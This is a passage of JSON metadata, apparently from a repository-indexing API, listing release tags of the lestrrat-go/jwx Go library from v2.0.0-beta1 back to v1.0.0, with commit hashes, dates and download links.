https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.23/manifests"},{"name":"v2.0.0-beta1","sha":"0258045345942aed8b8694da94cfb5ab4dd3261c","kind":"commit","published_at":"2022-04-09T13:16:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-beta1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta1/manifests"},{"name":"v1.2.22","sha":"f4701e19d38b7fd1ede0ef785867e078016b516e","kind":"commit","published_at":"2022-04-08T11:18:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.22","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.22/manifests"},{"name":"v2.0.0-alpha1","sha":"8a69aa2dd6b9a7a8284584cdd23acd96613c0866","kind":"commit","published_at":"2022-04-03T23:49:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-alpha1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-alpha1/manifests"},{"name":"v1.2.21","sha":"7b28f4c7fabe44249b77e058e5ca33c82b599d5e","kind":"commit","published_at":"2022-03-29T22:49:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.21","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.21/manifests"},{"name":"v1.2.20","sha":"3fa12c9bedcebd03db23f61cfb65ae0b040bf211","kind":"commit","published_at":"2022-03-03T05:56:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.20","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.20/manifests"},{"name":"v1.2.19","sha":"1c0a87feccf45c59a54ee3c9f2a995ab777953e7","kind":"commit","published_at":"2022-02-22T01:40:38.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.19","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.19/manifests"},{"name":"v1.2.18","sha":"2ab72de258ac966aeec3cfb836209692ed345586","kind":"commit","published_at":"2022-01-23T00:22:42.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.18","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.18/manifests"},{"name":"v1.2.17","sha":"300b79a15b99559ba7ad22e4275ecc99a07c359b","kind":"commit","published_at":"2022-01-12T10:10:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.17","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.17/manifests"},{"name":"v1.2.16","sha":"9349cc843391834794d593c4daa1345de1ab357e","kind":"commit","published_at":"2022-01-12T05:29:13.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.16","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.16/manifests"},{"name":"v1.2.15","sha":"5ded25fd0bf8f759a96a7ae3937df829d8e4777d","kind":"commit","published_at":"2022-01-06T23:30:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.15","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.15/manifests"},{"name":"v1.2.14","sha":"de7d9bca43812abc4f630320f8632108ccfe34bf","kind":"commit","published_at":"2021-12-22T01:34:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.14","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.14/manifests"},{"name":"v1.2.13","sha":"59f4c03c3e0aeb44f6b6a57fd96b90f9a679f880","kind":"commit","published_at":"2021-12-07T02:59:52.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.13/manifests"},{"name":"v1.2.12","sha":"45e532bbe4ada174b16f5f170ea62d2c8d83ef77","kind":"commit","published_at":"2021-12-01T06:52:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.12/manifests"},{"name":"v1.2.11","sha":"e371adc10f659fa05b064274ff549a8e0353d2b6","kind":"commit","published_at":"2021-11-13T15:34:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.11/manifests"},{"name":"v1.2.10","sha":"09a4d070eb0ec840a33597a67a17e6cddb53da87","kind":"commit","published_at":"2021-11-09T09:16:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.10/manifests"},{"name":"v1.2.9","sha":"b2da2238b7b342a8889470b901ef3024dfc0712a","kind":"commit","published_at":"2021-10-26T01:00:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.9/manifests"},{"name":"v1.2.8","sha":"f2bdd8c9df46d61fe987fa36bcc87c58ef846046","kind":"commit","published_at":"2021-10-21T01:23:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.8/manifests"},{"name":"v1.2.7","sha":"b9292016a6572dce779109d8da8d813b85abb658","kind":"commit","published_at":"2021-09-26T06:08:18.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.7/manifests"},{"name":"v1.2.6","sha":"41b30b67e905482292496e528119fc7482482ab3","kind":"commit","published_at":"2021-08-24T07:56:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.6/manifests"},{"name":"v1.2.5","sha":"551083cda79fd07493bf0db6e825278dd88c1fc3","kind":"commit","published_at":"2021-08-04T12:17:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.5/manifests"},{"name":"v1.2.4","sha":"d01528f5e5ae3221a48f67570928867e98184bbd","kind":"commit","published_at":"2021-07-15T13:26:23.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.4/manifests"},{"name":"v1.2.3","sha":"5e2de6ea11b5112bdf1a5e088d56c9c2e7fb6807","kind":"commit","published_at":"2021-07-15T09:53:13.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.3/manifests"},{"name":"v1.2.2","sha":"7159c501c5a43f8788f3a9a0961e146480c28eae","kind":"commit","published_at":"2021-07-12T23:38:00.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.2/manifests"},{"name":"v1.2.1","sha":"08de34253bc9633a11b019b143a2d212f8ff0ed8","kind":"commit","published_at":"2021-06-01T23:24:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"20fcd2aaea33121a0da375914a254615b3527c46","kind":"commit","published_at":"2021-04-29T23:40:49.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.0/manifests"},{"name":"v1.1.8-rc1","sha":"4fc7156e9562e4b51143220e830ed2d32279d2f6","kind":"commit","published_at":"2021-04-08T12:05:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.8-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.8-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.8-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.8-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.8-rc1/manifests"},{"name":"v1.1.7","sha":"db72eadbbe21fa7dc37d5628acfaa803fbf7d96e","kind":"commit","published_at":"2021-04-02T13:09:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7/manifests"},{"name":"v1.1.7-rc1","sha":"afd2d647f5892a70ab72ee14e9985ab5028bfb23","kind":"commit","published_at":"2021-03-31T06:49:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.7-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.7-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.7-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7-rc1/manifests"},{"name":"v1.1.6","sha":"df21963ac28051061a86f9c0e9671800312e6f18","kind":"commit","published_at":"2021-03-28T07:55:51.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"b2a7484c0e863f2730d3a7a79ade1deed9e85e13","kind":"commit","published_at":"2021-03-12T04:23:47.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5/manifests"},{"name":"v1.1.5-rc1","sha":"c9a7b177e98db06f4fcd57b90ddaeab8d436e0a9","kind":"commit","published_at":"2021-03-02T22:19:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.5-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.5-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.5-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5-rc1/manifests"},{"name":"v1.1.4","sha":"db48a5c54e2bf7d069a170de798d6bc914dae96d","kind":"commit","published_at":"2021-03-01T21:47:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"a7162536a2a50e66cc69bab0e4deb403e3f1fdc0","kind":"commit","published_at":"2021-02-22T08:42:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"a7f076fc6eadb44380d41b5e30eb5a85a91de864","kind":"commit","published_at":"2021-02-16T10:05:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"451a45cc212f752fa0011e64d8042ec87f0762df","kind":"commit","published_at":"2021-02-05T02:01:14.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"7f69ac971a6fd1cff28abadfe1e654f33004a19a","kind":"commit","published_at":"2021-01-31T07:52:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.0/manifests"},{"name":"v1.0.8","sha":"3bb9a18ceb5f45ffc4d0b837f85a5c3eb3f0bbfe","kind":"commit","published_at":"2021-01-14T23:41:30.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.8/manifests"},{"name":"v1.0.7","sha":"36d0cd5770ba08f66232bc143fd26856c258f27b","kind":"commit","published_at":"2021-01-11T10:52:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.7/manifests"},{"name":"v1.0.6","sha":"d4cb6651f457177451df330a37eaa0af4c7476a0","kind":"commit","published_at":"2020-12-16T21:36:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.6/manifests"},{"name":"v1.0.5","sha":"5aeabd78da3bab07a0ae04d299575f967590380e","kind":"commit","published_at":"2020-09-28T08:03:15.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"3d8cae88e8782b73d109e2cf66603b76826dd079","kind":"commit","published_at":"2020-08-14T13:41:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"3294517bae6989c5e89b00d0f72d79667d098942","kind":"commit","published_at":"2020-07-08T07:05:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.3/manifests"},{"name":"v1.0.2","sha":"d173045330f3e507d1d34b7fa622763dd744ecd6","kind":"commit","published_at":"2020-05-07T12:10:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"9969e2cb3255455a4a6b8a6da164bf80877155ef","kind":"commit","published_at":"2020-05-04T05:46:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5e17c3a031d6fb0962f929adcc3effc6dbb9f102","ki